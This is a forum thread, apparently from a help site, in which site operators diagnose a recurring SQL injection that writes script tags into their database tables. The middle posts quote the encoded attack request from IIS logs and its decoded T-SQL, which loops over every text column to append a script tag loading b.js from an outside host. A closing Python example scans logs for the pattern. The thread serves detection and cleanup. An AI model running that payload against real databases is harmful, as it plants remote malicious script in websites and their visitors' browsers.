vonfranzken

banner82 sql injection

Can someone tell me how to remove SQL injections?
Is banner82 one?

See www.moviecues.com

Click on search for songs and watch.
chapmandew

Not sure what you mean?
Can you clarify?
ASKER CERTIFIED SOLUTION
LoterX

d0n7_5h007

I'm experiencing this also; we clear the database of this text and 6 hours later the text appears again.
Maybe there was some sort of job created on your server that is doing it.  Run profiler around when you think it will happen again to see where the statement is coming from.
OK, our development team have been looking into this, and discovered the cause of it. It looks like a security vulnerability covered in MS KB article 951306.

If anyone experiencing the problem can look through their IIS web access logs for...
DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(…%20AS%20VARCHAR(4000));EXEC(@S);

Someone has been running that alongside one of our ASP pages.
Translating the hex string to ASCII results in the following...

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.exe94.com/b.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

Resulting in text actually being imported to the tables...
Well, that is sweet... was it SQL injected?
Yes it was. Quite a few tables were affected.

They had run the command after one of our search pages.

We're removing the injected strings (again) and will follow the guidelines of the KB article; hopefully we've solved this one.
You can probably get around it by just using a stored proc instead of the inline code.
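
The log check and hex translation described in the thread, as an added example that is not part of the original posts: it scans W3C-format IIS log lines for the DECLARE/CAST/EXEC pattern and decodes the hex literal so the injected SQL can be reviewed. It assumes the hex string is a 0x-prefixed T-SQL binary literal and generalizes to NVARCHAR casts; the log lines, IP addresses and payload are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# URL-decoded shape of the request quoted in the thread:
#   DECLARE @S VARCHAR(4000);SET @S=CAST(<hex> AS VARCHAR(4000));EXEC(@S);
# Assumption: <hex> is a 0x-prefixed T-SQL binary literal.
PATTERN = re.compile(
    r"DECLARE\s+@(\w+)\s+N?VARCHAR\(\d+\)\s*;\s*SET\s+@\1\s*=\s*CAST\(\s*"
    r"0x([0-9A-F]+)\s+AS\s+(N?)VARCHAR\(\d+\)\s*\)\s*;\s*EXEC\s*\(\s*@\1\s*\)",
    re.IGNORECASE,
)

def decode_hex_sql(hex_digits, wide):
    if len(hex_digits) % 2:            # pad so bytes.fromhex() accepts it
        hex_digits = "0" + hex_digits
    raw = bytes.fromhex(hex_digits)
    # NVARCHAR casts carry UTF-16LE text, VARCHAR casts single-byte text.
    return raw.decode("utf-16-le" if wide else "latin-1", errors="replace")

def scan_iis_log(lines):
    """Return one finding per W3C log entry whose query string matches."""
    fields, findings = [], []
    for line_no, line in enumerate(lines, 1):
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the entries below
            continue
        if line.startswith("#") or not line.strip():
            continue
        entry = dict(zip(fields, line.split()))
        query = unquote_plus(entry.get("cs-uri-query", ""))
        match = PATTERN.search(query)
        if match:
            findings.append({
                "line": line_no,
                "client": entry.get("c-ip"),
                "page": entry.get("cs-uri-stem"),
                "sql": decode_hex_sql(match.group(2), bool(match.group(3))),
            })
    return findings

# Constructed sample log: harmless payload, documentation IP addresses.
SAMPLE_SQL = "PRINT 'constructed sample'"
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2008-01-01 10:00:00 192.0.2.10 GET /search.asp term=music 200",
    "2008-01-01 10:00:05 198.51.100.7 GET /search.asp term=x;DECLARE%20@S%20"
    "VARCHAR(4000);SET%20@S=CAST(0x" + SAMPLE_SQL.encode("ascii").hex()
    + "%20AS%20VARCHAR(4000));EXEC(@S); 200",
]
print(scan_iis_log(SAMPLE_LOG))
```

Each finding names the page that received the request, which is the page whose inline SQL needs the fix discussed above.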